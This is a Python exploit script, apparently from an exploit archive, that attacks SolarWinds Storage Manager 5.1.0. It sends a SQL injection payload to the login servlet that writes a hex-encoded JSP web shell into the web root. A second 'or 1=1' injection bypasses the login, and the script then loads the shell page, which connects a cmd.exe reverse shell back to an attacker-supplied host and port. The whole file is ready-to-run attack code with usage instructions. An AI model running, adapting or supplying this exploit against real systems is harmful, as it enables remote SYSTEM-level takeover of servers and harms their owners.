111 lines
No EOL
3.4 KiB
Python
Executable file
111 lines
No EOL
3.4 KiB
Python
Executable file
#!/usr/bin/python
|
|
######################################################################################
|
|
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
|
|
# Date: May 2nd 2012
|
|
# Author: muts
|
|
# Version: SolarWinds Storage Manager 5.1.0
|
|
# Tested on: Windows 2003
|
|
# Archive Url : http://www.offensive-security.com/0day/solarshell.txt
|
|
######################################################################################
|
|
# Discovered by Digital Defence - DDIVRT-2011-39
|
|
######################################################################################
|
|
|
|
|
|
import urllib, urllib2, cookielib
|
|
import sys
|
|
import random
|
|
|
|
print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit"
|
|
print "[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39"
|
|
|
|
print "[*] Offensive Security - http://www.offensive-security.com\n"
|
|
if (len(sys.argv) != 4):
|
|
print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
|
|
exit(0)
|
|
|
|
rhost = sys.argv[1]
|
|
lhost = sys.argv[2]
|
|
lport = sys.argv[3]
|
|
|
|
filename = ''
|
|
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
|
|
filename+=i
|
|
filename +=".jsp"
|
|
|
|
output_path= "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" %filename
|
|
|
|
jsp = '''<%@page import="java.lang.*"%>
|
|
<%@page import="java.util.*"%>
|
|
<%@page import="java.io.*"%>
|
|
<%@page import="java.net.*"%>
|
|
|
|
<%
|
|
class StreamConnector extends Thread
|
|
{
|
|
InputStream is;
|
|
OutputStream os;
|
|
|
|
StreamConnector( InputStream is, OutputStream os )
|
|
{
|
|
this.is = is;
|
|
this.os = os;
|
|
}
|
|
|
|
public void run()
|
|
{
|
|
BufferedReader in = null;
|
|
BufferedWriter out = null;
|
|
try
|
|
{
|
|
in = new BufferedReader( new InputStreamReader( this.is ) );
|
|
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
|
|
char buffer[] = new char[8192];
|
|
int length;
|
|
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
|
|
{
|
|
out.write( buffer, 0, length );
|
|
out.flush();
|
|
}
|
|
} catch( Exception e ){}
|
|
try
|
|
{
|
|
if( in != null )
|
|
in.close();
|
|
if( out != null )
|
|
out.close();
|
|
} catch( Exception e ){}
|
|
}
|
|
}
|
|
|
|
try
|
|
{
|
|
Socket socket = new Socket( "''' + lhost +'''", '''+lport+''');
|
|
Process process = Runtime.getRuntime().exec( "cmd.exe" );
|
|
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
|
|
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
|
|
} catch( Exception e ) {}
|
|
%>'''
|
|
|
|
jsp = jsp.replace("\n","")
|
|
jsp = jsp.replace("\t","")
|
|
|
|
prepayload = "AAA' "
|
|
prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (jsp.encode('hex'),output_path)
|
|
prepayload += "#"
|
|
postpayload = "1' or 1=1#--"
|
|
loginstate='checkLogin'
|
|
password = 'OHAI'
|
|
|
|
cj = cookielib.CookieJar()
|
|
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
|
|
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : prepayload,'password' : password})
|
|
print "[*] Sending evil payload"
|
|
resp = opener.open("http://%s:9000/LoginServlet" %rhost, post_params)
|
|
print "[*] Triggering shell"
|
|
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : postpayload,'password' : password})
|
|
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
|
|
resp = opener.open("http://%s:9000/%s" % (rhost,filename))
|
|
print "[*] Check your shell on %s %s\n" % (lhost,lport)
|
|
|
|
# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111
|
|
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100 |